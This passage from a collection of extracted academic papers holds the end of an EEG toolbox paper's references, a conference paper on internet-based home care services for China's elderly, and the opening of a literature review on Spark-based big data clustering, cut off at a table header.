K, Laakso M, Haapa-Paananen S, Louhimo R, Chen P, Aittomäki V, Valo E, Núñez-Fontarnau J, Rantanen V, Karinen S, Nousiainen K, Lahesmaa-Korpinen A-M, Miettinen M, Saarinen L, Kohonen P, Wu J, Westermarck J, Hautaniemi S. 2010. Large-scale data integration framework provides a comprehensive view on glioblastoma multiforme. Genome Medicine 2(9):65 DOI 10.1186/gm186. Peyk P, De Cesarei A, Junghöfer M. 2011. ElectroMagnetoEncephalography software: overview and integration with other EEG/MEG toolboxes. Computational Intelligence and Neuroscience 2011:1–10 DOI 10.1155/2011/861705. Tadel F, Baillet S, Mosher JC, Pantazis D, Leahy RM. 2011. Brainstorm: a user-friendly application for MEG/EEG analysis. Computational Intelligence and Neuroscience 2011:1–13 DOI 10.3389/conf.fnins.2010.06.00107. Taulu S, Hari R. 2009. Removal of magnetoencephalographic artifacts with temporal signal-space separation: demonstration with single-trial auditory-evoked responses. Human Brain Mapping 30(5):1524–1534 DOI 10.1002/hbm.20627. Toivanen M, Pettersson K, Lukander K. 2015. A probabilistic real-time algorithm for detecting blinks, saccades, and fixations from EOG data. Journal of Eye Movement Research 8(2):1–14. Tremblay A, Newman AJ. 2015. Modeling nonlinear relationships in ERP data using mixed-effects regression with R examples. Psychophysiology 52(1):124–139 DOI 10.1111/psyp.12299. Widmann A, Schröger E. 2012. Filter effects and filter artifacts in the analysis of electrophysiological data. Frontiers in Psychology 3:233 DOI 10.3389/fpsyg.2012.00233. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 26/26 http://dx.doi.org/10.1155/2011/156869 http://dx.doi.org/10.1186/gm186 http://dx.doi.org/10.1155/2011/861705 http://dx.doi.org/10.3389/conf.fnins.2010.06.00107 http://dx.doi.org/10.1002/hbm.20627 http://dx.doi.org/10.1111/psyp.12299 http://dx.doi.org/10.3389/fpsyg.2012.00233 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ Computational testing for automated preprocessing: a Matlab toolbox to enable large scale electroencephalography data processing ... Introduction Materials and Methods Results Discussion Conclusion flink6 References work_r5oszxygkzf63ju3e2l3nruudq ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 113 Research on Information Service of Home Care in Internet Plus Era Jie Zhao Xi’an Peihua University Xi’an, 710109, China e-mail: 64789178@qq.com Abstract—In the “Internet plus” era, information technology will be applied to the community home-based care services is a new initiative to create wisdom of the pension industry. With the full use of the Internet and large data, the new model of home care for the elderly needs the active participation of the social organizations (enterprises), and the correct guidance of the government. Strengthening the top-level design of government, establishing the information standard and enhancing the applicability of platform will undoubtedly speed up the informatization construction of home care platform and promote the development of our pension system. Keywords-Home Care Internet Plus Information I. INTRODUCTION In recent years, with the rapid development of China's economy, the problem of population aging is becoming more and more serious. According to the bulletin of “Social Service Development released by the Ministry of civil affairs in 2016”, as the end of 2016, there are 230 million 860 thousand people with aged of 60 and more, over accounted for 16.7% of the total population in China. Among them, 150 million 30 thousand of the population aged 65 and over accounted for 10.8% of the total population. Since 1980s, our country attaches great importance to the aging problem is increasingly enhanced.In December 2011 promulgated the "social pension service system construction plan (2011 - 2015) clearly pointed out: the construction of the social old-age service system should be home-based, community-based, institutional support, the State Council promulgated. In February 28, 2017, “13th Five-Year” national aging development and pension system is constructed as follow, home-based, community-based, institutional as supplement, medical support combined old-age service system. However, according to the survey data from the national aging office, it is found that the demand rate of urban home care services in China is only 15.9%. The most prominent problem in home care services is insufficient supply, and the contradiction between supply and demand is outstanding. On March 2015, Premier Li Keqiang first proposed the “Internet plus” action plan in the government work report.In April at the same year, the national development and reform commission, the ministry of civil affairs, commission and other departments in the “notice” on further improving the development of pension services related work.The “Internet plus pension service” is a new course. In July of the same year, the State Council issued the “Internet plus "action guidance” clearly put forward to accelerate the development of home network information services, and promote the healthy development of the pension industry “wisdom” to promote the healthy development of the pension industry wisdom, support intelligent health product innovation and application, promote the comprehensive quantitative healthy new ways of life. Accordingly, based on the existing internet resources and social forces, based on the community building endowment information service network platform, to provide nursing care, health management, rehabilitation care in a series of “Internet plus” mode of home care information construction began throughout the trial, which has gradually become an effective approach to solving the shortage, home care service supply in the supply and demand contradiction of this fundamental problem. Leveraging “Internet plus”, to the mobile internet terminal for the media, 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 114 community-based information service platform for community elderly, providing targeted services, to meet the various needs of different aged, thus constructing home-based care services information platform, providing information and convenient service for the elderly community, both can break the traditional pension service time and space constraints, thus extending the traditional pension service scope, also can bring market and social resources to actively participate in the construction of the system of social services, and from the problem of insufficient resources for pension services. II. HOME-BASED CARE SERVICES INFORMATIZATION CONSTRUCTION Home care service is a kind of service form that the society provides for the old people living at home to solve the daily life difficulties. It has been playing an increasingly important role in the pension service as the foundation of our social pension service system. It is an important measure to solve the problem of pension in China. However, due to the asymmetric information of service supply, a part of the elderly does not know the home care service and do not know the content of home care services, so it is necessary to build information platform for home care services. The information technology of home care service refers to the integration process of the new generation of information technology based on the mobile Internet, Internet of things, cloud computing, big data and other Internet technologies in the field of home care services. “Internet plus community home-based care services” as a new industry is still in the initial stage, in 2015, to promote wide application of the Internet, networking and other information technology in the field of community service and pension services, the Ministry of civil affairs to determine the first pension service and community service information Huimin pilot project units and areas, involving 22 provinces and autonomous region. Many of them have been built on the information platform for the old-age service. At present, Shanghai, Suzhou, Lanzhou, Qinhuangdao, Tianjin, Xiamen city has made some useful exploration, have started the home-based care services information platform construction, the establishment of a community home-based care services information platform. There are several pension mode in different city, such as Ningbo's mutual aid pension services, the wisdom of Xiamen pension, or Shanghai City Comprehensive service platform for the old in China. Home-based care services has made some achievements and accumulated some experience, the typical practice of some of the city's analysis as follows in Table 1. From the "Internet plus" home care services in the practice case of China can be seen through the pension information platform to carry out home-based care services to solve the supply and demand information asymmetry, single service and service quality, has great advantages in the field of home-based care services. A. Keep up with the development of the times and improve the efficiency of community home care service With the popularity of intelligent terminals in people's daily life, more and more people are used to exchanging and trading on the information platform. In the era of big data, all kinds of information can be effectively integrated in the database, providing great convenience for people's production and life. The construction of community home care information platform is a new mode that is close to people's lifestyle. It can effectively collect all kinds of information and sort out, greatly improving the efficiency of home care services. B. The advantage of buying public service is obvious The government purchase of public services is the community old-age home in the road, the government as a direct provider of services, to address the needs of the elderly home care service part through the purchase of the service, not only can reduce the burden of government staff, also solves the problem of the administration of human resources is not enough, not professional service team, to maximize the integration of community resources, solve the problem of limited government resources. "Internet plus" home-based care services with the pension information service platform construction can effectively solve the existing community endowment service level of a single, poor professional, poor service quality problems. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 115 TABLE I. HOME-CARE SOCIAL PENSION SYSTEM IN DIFFERENT CITY Project name Main service Character Ningbo Jiangdong District "home integration" pension 1. Construct a database (database) Line (87680000 service hotline) a machine (old machine) system (home integration information system) "information service model; 2. The virtual network and the entity network are mutual and mutual promotion to realize the integration of information network and service function. 1. The construction of the information system is comprehensive and the resources are used reasonably. 2. The information of the service for the aged and the service for the aged are interconnected, and the resources are effectively used. Xiamen wisdom Pension 1. Pension information platform has set up a public service center for the aged. 2. Opened the "12349" service special for the aged, and provided the hotline service for 24 hours. 3. platform has developed smart watches, fall alarm, smart mattress and other intelligent devices, which can monitor the elderly's health in real time and alarm in time, providing good support for emergency rescue. 1. "Platform" + "hotline" to build a three-dimensional old-age service information system. 2. The combination of online information and offline services to form a new model for the elderly. 3. Use intelligent equipment to monitor the elderly in real time and provide effective emergency rescue for the elderly. Health room in Guangxi 1. Government led, enterprises to host building healthy huts; 2. To establish the information database for the elderly and the dynamic electronic health files for the elderly, and provide the services of health management, living care and mental care. 3. Build an information, intelligent call service and support center to establish a perfect health care system for the elderly. 1. "Government + enterprise" operates the old-age information system to reduce the burden of the government's pension investment. 2. The use of information database for the elderly provides accurate information for the service of the aged. Shanghai is an old service platform 1. (www.shweilao.cn Shanghai integrated service platform for old age). It has three functions of "unified portal for old information service", "unified entrance of old age service industry management" and "old database of service resources". 2. Integrate and link all kinds of old service information to facilitate the public browsing and inquiring the content and service information of the industry. 3. Use the information system to implement dynamic management for the old service institutions and personnel, and strengthen the service and supervision of the industry. 1. Comprehensive services for the old service platform to achieve a powerful, "one key service"; 2. The elderly are combined with management and supervision to achieve multiple services in management. Qinhuangdao endowment service website 1. Strengthen the construction of information, establish a public web site for the old-age service industry and the service website of each community pension center. 2. The page design and language of the web site are concise and clear and clear at a glance. 1. The information is released in time to facilitate the users to understand the service information quickly. 2. The web design is concise and convenient for the communit residents and the elderly to look up. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 116 C. Taking the needs of the elderly as the guidance to effectively meet the elderly's needs for the aged Only with the needs of the elderly, can the participation rate of community residents be improved and the effective demand of community home care for the elderly can be met. Because of the diversity, dynamicity and variability of the needs of the elderly, the demand for services varies from different health status, income level and so on. With home care information platform, the elderly can choose their own services on the platform to meet the personalized needs of the elderly, and also solve the current plan of home care services. III. PROBLEMS IN “INTERNET PLUS” HOME-BASED CARE SERVICES Although the "Internet plus" home-based care services in the community home endowment service has played an important role, but there are also some problems. A. Lack of industry standards and effective supervision Standard construction of our country at present the information in the community home-based care services is still lagging behind, the country has not yet formed a "Internet plus" community home-based care services and the corresponding management norms and service standards, quality standards are not yet on the wisdom of the pension service industry entry and exit, intelligent community home care services, pension services and intelligent system to provide services organization evaluation explicit specification. It is precisely because of lack of industry standards that further leading to government supervision is not in place. It has not yet been scientifically evaluated objectively for the information platform itself and the organization providing pension services. B. Over reliance on the government, the low degree of Marketization At present, though the government tries to alleviate the problem of effective supply of pension services by buying services, entrusting business and public-private partnerships, the effect is not obvious, and the contradiction between supply and demand is still outstanding. Although the existing pension information platform alleviates these contradictions to a certain extent, the phenomenon of relying on the government is still obvious because the current home care is still dominated by the government. In addition, under the background of the government led, market organization's participation in community home care services is not very active, resulting in inefficient use of the information platform, and the effectiveness has not yet been effectively implemented. C. Incompatibility of pension information platform At present, the information platform of community home care service mainly adopts government departments as the center to issue government information, even though some platforms extend to the communities where the elderly live, but it is still difficult to achieve the downward shift of management focus. Moreover, the information platform developed by each intelligent pension enterprise is not compatible with each other, and does not connect with the government's pension service information network platform. The information can not be shared, which affects the construction of the public information platform for the old-age service. IV. IMPROVE THE COUNTERMEASURES OF HOME-BASED CARE SERVICES OF THE INTERNET PLUS " A. Strengthen the design of the top level of the government, to promote the cooperation of the departments and to establish the standard system of information standards The government plays an important role in the development of social service for the aged, as well as the planners, policymakers and supervisors. In the construction of "Internet plus" community home-based care services system, the government should still play a key role. First, from the policy level to improve the relevant legislation, to provide policy support for the "Internet plus" home-based care services. Second, we should set up a unified standard system for the elderly service information as soon as possible, and speed up the research and formulation of the information standard of the old age service according to the actual needs, the formulation of standards, the sharing of information, the 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 117 sharing of resources, and the interactive use of information platforms. B. Guide social organizations and companies to participate in the information construction of community home care service “Internet plus” home-based care services is home-based care services activities carried out under the guidance of the government. It needs the active participation of social organizations and market forces, so that we can solve various problems faced by the elderly at home, and meet the needs of the elderly in the diversified pension system. To this end, the government should take government procurement, government enterprise cooperation and other ways to guide the social organizations and companies to participate in the construction of the service platform for the aged. At the same time, the introduction of preferential measures in taxation, land, construction, encourage and support social forces to invest in "Internet plus" home-based care services platform. C. The applicability of improvement Internet plus "old-age home information platform From the building “Internet plus” home care information platform's efficiency, mainly is the basic information data of the elderly registration, collection and input, so as to establish the elderly database, the elderly mainly by phone or smart devices on the platform subscription service. This is just the initial stage of home care information, to obtain the considerable development, the construction must pay attention to the applicability of the platform, the integration of social resources, the life care services, health care and psychological comfort services connected through the network, the realization of “one button”, improve the quality of home-based care services. V. CONCLUSIONS Facing the pressure of population aging and the decline of family care function, it is no doubt that the cooperation between the government and the third party to provide pension services is a great measure to solve the pension problem. "Internet plus" the use of information technology, the government, social organizations (enterprises), the elderly link, extension of home-based care services in time and space, help to promote the full coverage of social endowment service, solve the menace from the rear of the elderly. REFERENCE [1] Wang Yong. Intelligent pension service "decompression" -- an interview with the national office on aging inspector, Hualing intelligent endowment industry development center director Zhu Yong [EB/OL].http://www.lepp.zju.edu.cn/show.aspx id=1866&cid=23.2015-10-17.? [2] Smart community health house is officially stationed in Guangxi Guangxi.[EB/OL]. news network http://www.gxnews.com.cn/staticpages/20170318/newgx58cd4476-1 6031920.shtml.2017-03-18.. [3] Zhu Xiaozhuo. Study on pension service model [J]. aging scientific research integration in Jiangdong District of Ningbo city hospital, 2017 (17): 57 - 61. [4] Li Yuhui To create a new pattern of Internet plus community home endowment "[J]. China civil affairs, 2016 (11):55 56. [5] Li Zhenglong, Wang Hong. Shanghai's accelerated development to the old service system research [M]: Shanghai Jiao Tong University press, 2012. [6] Liu He, Cheng Si. "Internet plus" under the background of informationization construction countermeasure research in Qinhuangdao city community endowment [J]. China high tech Zone, 2017 (24): 181, 208. [7] Li Changyuan. "Internet plus" in the application of community home endowment service problems and Countermeasures in the [J]. Journal of Beijing University of Posts and Telecommunications (SOCIAL SCIENCE EDITION), 2016 (10): 67 - 73. [8] Yuan Xiaoliang. "Practical reflection Internet plus" wisdom Pension -- Based on the research of X Z platform [J]. analysis of social work and management, 2016 (03): 56 - 60. work_r6leqo5ppjbtbo47mcs26brbx4 ---- Submitted 4 August 2020 Accepted 4 November 2020 Published 30 November 2020 Corresponding author Mozamel M. Saeed, m.musa@psau.edu.sa, mozamel8888@gmail.com Academic editor Feng Xia Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.321 Copyright 2020 Saeed et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Big data clustering techniques based on Spark: a literature review Mozamel M. Saeed1, Zaher Al Aghbari2 and Mohammed Alsharidah1 1 Department of Computer Science, Prince Sattam Bin Abdul Aziz, Riyadh, Saudi Arabia 2 Department of Computer Science, University of Sharjah, Sharjah, United Arab Emirates ABSTRACT A popular unsupervised learning method, known as clustering, is extensively used in data mining, machine learning and pattern recognition. The procedure involves grouping of single and distinct points in a group in such a way that they are either similar to each other or dissimilar to points of other clusters. Traditional clustering methods are greatly challenged by the recent massive growth of data. Therefore, several research works proposed novel designs for clustering methods that leverage the benefits of Big Data platforms, such as Apache Spark, which is designed for fast and distributed massive data processing. However, Spark-based clustering research is still in its early days. In this systematic survey, we investigate the existing Spark-based clustering methods in terms of their support to the characteristics Big Data. Moreover, we propose a new taxonomy for the Spark-based clustering methods. To the best of our knowledge, no survey has been conducted on Spark-based clustering of Big Data. Therefore, this survey aims to present a comprehensive summary of the previous studies in the field of Big Data clustering using Apache Spark during the span of 2010–2020. This survey also highlights the new research directions in the field of clustering massive data. Subjects Data Mining and Machine Learning, Data Science, Distributed and Parallel Computing Keywords Spark-based clustering, Big Data clustering, Spark, Big Data INTRODUCTION With the emergence of 5G technologies, a tremendous amount of data is being generated very quickly, which turns into a massive amount that is termed as Big Data. The attributes of Big Data such as huge volume, a diverse variety of data, high velocity and multivalued data make data analytics difficult. Moreover, extracting meaningful information from such volumes of data is not an easy task (Bhadani & Jothimani, 2016). As an indispensable tool of data mining, clustering algorithms play an essential role in big data analysis. Clustering methods are mainly divided into density-based, partition-based, hierarchical, and model-based clustering. All these clustering methods are developed to tackle the same problems of grouping single and distinct points in a group in such a way that they are either similar to each other or dissimilar to points of other clusters. They work as follows: (1) randomly select initial clusters and (2) iteratively optimize the clusters until an optimal solution is reached (Dave & Gianey, 2016). Clustering has an enormous application. For instance, clustering is used in intrusion detection system for the detection of anomaly behaviours (Othman et al., 2018; Hu et al., 2018). Clustering is also used extensively in text analysis to classify documents How to cite this article Saeed MM, Al Aghbari Z, Alsharidah M. 2020. Big data clustering techniques based on Spark: a literature review. PeerJ Comput. Sci. 6:e321 http://doi.org/10.7717/peerj-cs.321 https://peerj.com/computer-science mailto:m.musa@psau.edu.sa mailto:mozamel8888@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.321 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.321 into different categories (Fasheng & Xiong, 2011; Baltas, Kanavos & Tsakalidis, 0000). However, as the scale of the data generated by modern technologies is rising exponentially, these methods become computationally expensive and do not scale up to very large datasets. Thus, they are unable to meet the current demand of contemporary data-intensive applications (Ajin & Kumar, 2016). To handle big data, clustering algorithms must be able to extract patterns from data that are unstructured, massive and heterogeneous. Apache Spark is an open-source platform designed for fast-distributed big data processing. Primarily, Spark refers to a parallel computing architecture that offers several advanced services such machine learning algorithms and real time stream processing (Shoro & Soomro, 2015). As such, Spark is gaining new momentum, a trend that has seen the onset of wide adoption by enterprises because of its relative advantages. Spark grabbed the attention of researchers for processing big data because of its supremacy over other frameworks like Hadoop MapReduce (Verma, Mansuri & Jain, 2016). Spark can also run in Hadoop clusters and access any Hadoop data source. Moreover, Spark Parallelization of clustering algorithms is an active research problem, and researchers are finding ways for improving the performance of clustering algorithms. The implementation of clustering algorithms using spark has recently attracted a lot of research interests. This survey presents the state-of-the-art research on clustering algorithms using Spark Platform. Research on this topic is relatively new. Efforts started to increase in the last few years, after the Big Data platform, such as Apache Spark, was developed. This resulted in a number of research works that designed clustering algorithms to take advantage of the Big Data platforms, especially Spark due to its speed advantage. Therefore, review articles are needed to show an overview of the methodologies of clustering Big Data, highlight the findings of research and find the existing gaps this area. Consequently, few researchers have published review articles (Labrinidis & Jagadish, 2012; Gousios, 2018; Aziz, Zaidouni & Bellafkih, 0000; Salloum et al., 2016; Mishra, Pathan & Murthy, 2018; Aziz, Zaidouni & Bellafkih, 2018; Assefi et al., 2017; Armbrust et al., 2015; Xin et al., 2013; Xu & Tian, 2015; Zerhari, Lahcen & Mouline, 2015). These review articles are either before 2016 or do not present a comprehensive discussion on all types of clustering methods. Therefore, a comprehensive review on clustering algorithms of big data using Apache Spark is needed because it is conducted based on a scientific search strategy. To the best of our knowledge, no survey has been conducted on Spark-based clustering of Big Data. For this purpose, this survey aims to present a comprehensive summary of the previous studies in the field of Big Data clustering using Apache Spark during the span of 2010–2020. The contributions of this review are: • This review includes quality literature from pre-defined resources and based on pre- defined inclusion/exclusion criteria. Therefore, out of the 476 full-text articles studied, 91 articles were included. • A taxonomy of Spark-based clustering methods that may point researchers to new techniques or new research areas. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 2/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 • A comprehensive discussion on the existing Spark-based clustering methods and the research gaps in this area. Furthermore, we presented some suggestions for new research directions. We believe that researchers in the general area of cluster Big Data and specially those designing and developing Spark-based clustering would benefit from the findings of this comprehensive review. The rest of this survey is organised as follows. ‘Background’ presents the related surveys to the topic of clustering Big data. In ‘Literature Review’, we present a background on the Apache Spark. ‘Survey Methodology’ explains the methodology used in this survey. ‘Survey Methodology’ discusses the different Spark clustering algorithms. In ‘Discussion and Future Direction’, we present our discussion the clustering big data using Spark and future work. Finally, we conclude the paper in ‘Conclusions’. BACKGROUND Over the last decade, a huge amount of data has been generated. This increase in data volume is attributed to the growing adoption of mobile phones, cloud-based applications, artificial Intelligence and Internet of Things. Contemporary data come from different sources with high volume, variety and velocity, which make the process of mining extremely challenging and time consuming (Labrinidis & Jagadish, 2012). These factors have motivated the academic and the industrial communities to develop various distributed frameworks to handle the complexity of modern datasets in a reasonable amount of time. In this regard, Apache spark, a cluster computing, is an emerging parallel platform that is cost-effective, fast, fault-tolerant and scalable. Thereby, such features make Spark an ideal platform for the dynamic nature of the contemporary applications. Spark is designed to support a wide range of workloads including batch applications, iterative algorithms, interactive queries, and streaming (Gousios, 2018). Spark extends the Hadoop model and support features such as in-memory computation and resilient distributed dataset, which make it significantly faster than the traditional Hadoop map-reduce for processing large data (Aziz, Zaidouni & Bellafkih, 0000). As shown in Fig. 1, at the fundamental level, spark consist of two main components; A driver which takes the user code and convert it into multiple tasks which can be distributed across the hosts, and executors to perform the required tasks in parallel. Spark is based on RDD, which is a database tables that is distributed across the nodes of the cluster. Spark supports two main operations; Transformations; and actions. Transformation preform operations on the RDD and generates new one; Action operations are performed on RDD to produce the output (Salloum et al., 2016). Spark components Spark core Spark core is the foundation of Apache Spark and contains important functionalities, including components for task scheduling, memory management, fault recovery, interacting with storage systems. Spark Core is also home to the API that defines resilient Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 3/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 Figure 1 Apache Spark Architecture. Full-size DOI: 10.7717/peerjcs.321/fig-1 distributed datasets (RDDs), which are Spark’s main programming abstraction. RDDs represent a collection of items distributed across many compute nodes that can be manipulated in parallel. Spark Core provides many APIs for building and manipulating these collections (Mishra, Pathan & Murthy, 2018). Spark streaming Spark streaming component provide scalable, high throughput API for processing of real-time stream data from various sources. Examples of data streams include logfiles generated by production web servers, or queues of messages containing status updates of a particular system (Aziz, Zaidouni & Bellafkih, 2018). Spark MLlib Spark comes with a library MLlib which supports several common Machine Learning algorithms that include classification, regression, clustering, features extraction, transformation and dimensionality reductions (Assefi et al., 2017). Spark SQL Spark SQL (Armbrust et al., 2015) is a module for processing structured data, which also enables users to perform SQL queries. This module is based on the RDD abstraction by providing Spark core engine with more information about the structure of the data. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 4/28 https://peerj.com https://doi.org/10.7717/peerjcs.321/fig-1 http://dx.doi.org/10.7717/peerj-cs.321 Spark graphx GraphX (Xin et al., 2013) is a library for manipulating graphs (e.g., a social network’s friend graph) and performing graph-parallel computations. Like Spark Streaming and Spark SQL, GraphX extends the Spark RDD API, allowing us to create a directed graph with arbitrary properties attached to each vertex and edge. GraphX also provides various operators for manipulating graphs (e.g., subgraph and mapVertices) and a library of common graph algorithms. Clustering big data Clustering is a popular unsupervised method and an essential tool for Big Data Analysis. Clustering can be used either as a pre-processing step to reduce data dimensionality before running the learning algorithm, or as a statistical tool to discover useful patterns within a dataset. Clustering methods are based on iterative optimization (Xu & Tian, 2015). Although these methods are effective in extracting useful pattern from datasets, they consume massive computing resources and come with high computational costs due to the high dimensionality associated with contemporary data applications (Zerhari, Lahcen & Mouline, 2015). Challenges of clustering big data The challenges of clustering big data are characterized into three main components: 1. Volume: as the scale of the data generated by modern technologies is rising exponentially, clustering methods become computationally expensive and do not scale up to very large datasets. 2. Velocity: this refers to the rate of speed in which data is incoming to the system. Dealing with high velocity data requires the development of more dynamic clustering methods to derive useful information in real time. 3. Variety: Current data are heterogeneous and mostly unstructured, which make the issue to manage, merge and govern data extremely challenging. Conventional clustering algorithms cannot handle the complexity of big data due the above reasons. For example, k-means algorithm is an NP-hard, even when the number of clusters is small. Consequently, scalability is a major challenge in big data. Traditional clustering methods were developed to run over a single machine and various techniques are used to improve their performance. For instance, sampling method is used to perform clustering on samples of the data and then generalize it to the whole dataset. This reduces the amount of memory needed to process the data but results in lower accuracy. Another technique is features reduction where the dimension of the dataset is projected into lower dimensional space to speed up the process of mining (Shirkhorshidi et al., 0000). Nevertheless, the constant growth in big data volume exceeds the capacity of a single machine, which underline the need for clustering algorithms that can run in parallel across multiple machines. For this purpose, Apache spark has been widely adapted to cope with big data clustering issues. Spark provides in-memory, distributed and iterative computation, which is particularly useful for performing clustering computation. It also provides advanced local data caching system, fault-tolerant mechanism and faster-distributed file system. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 5/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 LITERATURE REVIEW The topic of clustering big data using Spark platform have not been adequately investigated by academia. This suggests a comprehensive survey on research works in this regard. The literature in this area has already come up with some surveys and taxonomies, but most of them are related to Hadoop platform while others are outdated or do not cover every aspect of clustering big data using Spark. The work in Rotsnarani & Mrutyunjaya (2015) conducted a survey on Hadoop framework for big data processing. Different features of Hadoop map-reduce are discussed to deal with the problems of scalability and complexity for processing big data. Rujal & Dabhi (2016) conducted a survey on k-means using map reduce model. In this article the technical details of parallelizing k-means using Apache Hadoop is discussed. According to this research, k-means method is regarded as a viable approach for certain applications of big data clustering and has attracted many researchers than any other techniques. On the other hand, (Sood & Singh, 2019) conducted a survey on the major challenges for big data processing using Hadoop map- reduce. According to this survey, network latency is the main limitation of Hadoop. The authors of Manwal & Gupta (2017) conducted a survey on big data and Hadoop architecture. The paper classifies existing Hadoop based systems and discusses their advantages and disadvantages. The paper explains the different technologies (Hbase, Hive, Pig, etc.) used with the Hadoop distributed file system (HDFS). Jiang et al. (2010) conducted a survey on large scale data processing using Hadoop over the cloud. The main components of Hadoop platform and their functionalities are discussed. The work in Shanjiang et al. (2018) conducted a comprehensive survey on spark ecosystem for processing large-scale data. In this article, spark architecture and programming model is introduced. The authors discussed the pros and cos of spark platform as well as the various optimization techniques used for improving spark performance for processing large scale data. In Maheshwar & Haritha (2016), the authors discussed the advantages of spark over the Hadoop map-reduce model. Huang et al. (2017) conducted a survey on the parallelization of density-based clustering algorithm for spatial data mining based on spark. The authors of Ketu & Agarwal (2015) conducted a performance evaluation of k-means over spark and map- reduce. On the other hand, a performance evaluation of three versions of k-means clustering for biomedical data using spark was conducted in Shobanadevi & Maragatham (2017). A performance evaluation of parallel k-means with optimization algorithms for clustering big data using spark was conducted in Santhi & Jose (2018). However, all the above surveys are either before 2016 or do not present a comprehensive discussion on all types of clusters. Therefore, a comprehensive survey on clustering algorithms of big data using Apache Spark is required to assess the current state-of-the-art and outline the future directions of clustering big data. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 6/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 SURVEY METHODOLOGY The subject matter reviewed in this article is based on a literature review in clustering methods using Apache spark. We searched for the works regarding this topic and classify them into different Clustering techniques. All these papers talk about optimizing clustering techniques to solve the issues of big data clustering problems for various problems, viz., improve clustering accuracy, minimize execution time, increase throughput and scalability. Particularly, we are addressing the following questions: • What are the types of Spark-based clustering methods? • Which methods were used in the literature to cluster Big Data? • What are the gaps in this research area? • What optimization techniques were used in clustering? • What are the pros and cons of the different Spark-based clustering methods? Search strategy To narrow the scope of the searching for relevant papers to be included in this study, we used the ‘‘AND’’ and ‘‘OR’’ Boolean operators to combine the terms related to Spark-based clustering of Big Data. The following terms are used to find the relevant papers. • ‘‘Clustering big data using spark’’, • ‘‘Apache Spark for Big data’’, • ‘‘Clustering Big Data’’, • ‘‘Clustering methods’’, • ‘‘Data partitioning’’, • ‘‘Big Data Partitioning’’, • ‘‘Data segmentation’’. The papers relevant to Spark-based clustering of Big Data were retrieved from the following online sources. • IEEE Explorer • Springer, • Elsevier • ScienceDirect, • Google Scholar, • Researchgate, Paper filtering Initially 1,230 and additional 43 reference books papers were identified through our search using the previously explained research strategies. As shown in Fig. 2, 797 of these were eliminated via our exclusion criteria. 476 papers were remaining. By reading and analysing the full-text articles, 385 of them were excluded. Irrelevant papers were removed by applying the exclusion criteria (shown below). In addition, duplicate papers retrieved from multiple sources were removed. Finally, 91 articles were included in this survey. The following inclusion/exclusion rules are applied on these papers. • Inclusion criteria: Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 7/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.321 Records identified through database searching (n = 1230 ) S cr e e n in g In cl u d e d E li g ib il it y Id e n ti fi ca ti o n Additional records identified through other sources (n = 43 ) Records after duplicates removed (n = 1273 ) Records screened (n = 1273 ) Records excluded (n = 797 ) Full-text articles assessed for eligibility (n = 476 ) Full-text articles excluded, with reasons (n = 385 ) Studies included in qualitative synthesis (n = 91 ) Studies included in quantitative synthesis (meta-analysis) (n = 91 ) Figure 2 Flowchart for paper exclusion. Full-size DOI: 10.7717/peerjcs.321/fig-2 – papers published within the period from January 2010 to April 2020. – papers in the area of Spark-based Big data clustering. – papers written in English language. • Exclusion criteria: – papers on clustering but not on Big data. – papers that are not using a Big data platform such as Spark. papers with no clear publication information, such as publisher, year, etc. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 8/28 https://peerj.com https://doi.org/10.7717/peerjcs.321/fig-2 http://dx.doi.org/10.7717/peerj-cs.321 Figure 3 Taxonomy of Spark-based clustering methods. Full-size DOI: 10.7717/peerjcs.321/fig-3 Spark-based clustering algorithms In this work, the taxonomy of Spark-based Big Data clustering is developed to cover all the existing methods. Figure 3 shows the developed taxonomy. Survey Findings: The research questions (see ‘Survey Methodology’) that we investigated in this survey are addressed as shown below: • Answer to Q1: The Spark-based clustering algorithms were divided into three main categories: k-means based methods, hierarchal-based methods and density based methods. Each of these main categories were divided further into subcategories as depicted in Fig. 3. A detailed discussion of the Spark-based clustering methods in these subcategories is presented in the subsection below ‘k-means based Clustering’, ‘Hierarchical clustering’ and ‘Density based-clustering’ Fig. 3 and Table 1). • Answer to Q2: We discuss the different methods that have been proposed in the literature under each of the three main Spark-based clustering categories in ‘k-means based Clustering’, ‘Hierarchical clustering’ and ‘Density based-clustering’. The methods in these subsections are grouped based on their similarities in the approach. This grouping of the discussed methods is shown in Table 1. • Answer to Q3: The gaps in the Spark-based clustering field are identified into two main points. The first is the lack of utilizing AI tools in clustering data and lack of using Big Data platforms. The second is that most current clustering methods do not support the characteristics of variety and velocity of Big Data. More discussion on this issue is in ‘Discussion and Future Direction’. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 9/28 https://peerj.com https://doi.org/10.7717/peerjcs.321/fig-3 http://dx.doi.org/10.7717/peerj-cs.321 Table 1 Comparison of Spark-based Clustering methods in terms of the supported Big Data characteristic (volume, variety and velocity) and in terms of the type of data (real and synthetic) the proposed method was validated. Category Sub-category Paper Supported Big Data Characteristic Validated on volume variety velocity Real Synthetic 